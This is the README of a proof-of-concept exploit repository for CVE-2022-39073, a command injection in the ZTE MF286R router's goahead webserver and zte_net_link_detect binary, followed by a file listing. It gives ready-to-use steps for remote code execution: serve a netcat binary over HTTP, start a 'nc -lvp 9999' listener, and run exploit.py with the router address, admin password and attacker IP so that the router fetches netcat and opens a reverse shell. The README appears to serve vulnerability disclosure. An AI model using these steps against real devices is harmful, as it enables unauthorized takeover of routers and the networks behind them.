Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit.# CVE-2022-39073
Firmware details:
```
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
```
## Prerequisites
- requests (`pip install requests`)
## Command Injection
The vulnerability is a shared command injection between the `zte_net_link_detect` binary and the `WATCH_DOG_SWITCH` handler in the webserver `goahead` binary.
Note that the vulnerability can only be exploited when the router is connected to the WAN or connected to the Internet via a SIM card. (The value of the "ppp_status" key must be "ppp_connected" or "ipv4_ipv6_connected" or "ipv6_connected").
### Risks
- Remote code execution (RCE)
- Arbitrary command execution
### Proof of Concept
The idea of exploit is to download the netcat static binary from an http server and then open a reverse shell with it.
P.S: The netcat included in this folder is big endian.
- Open an http server in this directory `python3 -m http.server 8080`
- Open a listening socket on port `9999` with `nc -lvp 9999`
- Run the script in this folder `python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>`
## References
This vulnerability was reported by Andrea Maugeri in September 2022.
https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664
[4.0K] /data/pocs/bfafa845d1a862f1bb82b28750b945fd30762285
├── [2.0K] exploit.py
├── [174K] netcat
└── [1.3K] README.md
0 directories, 3 files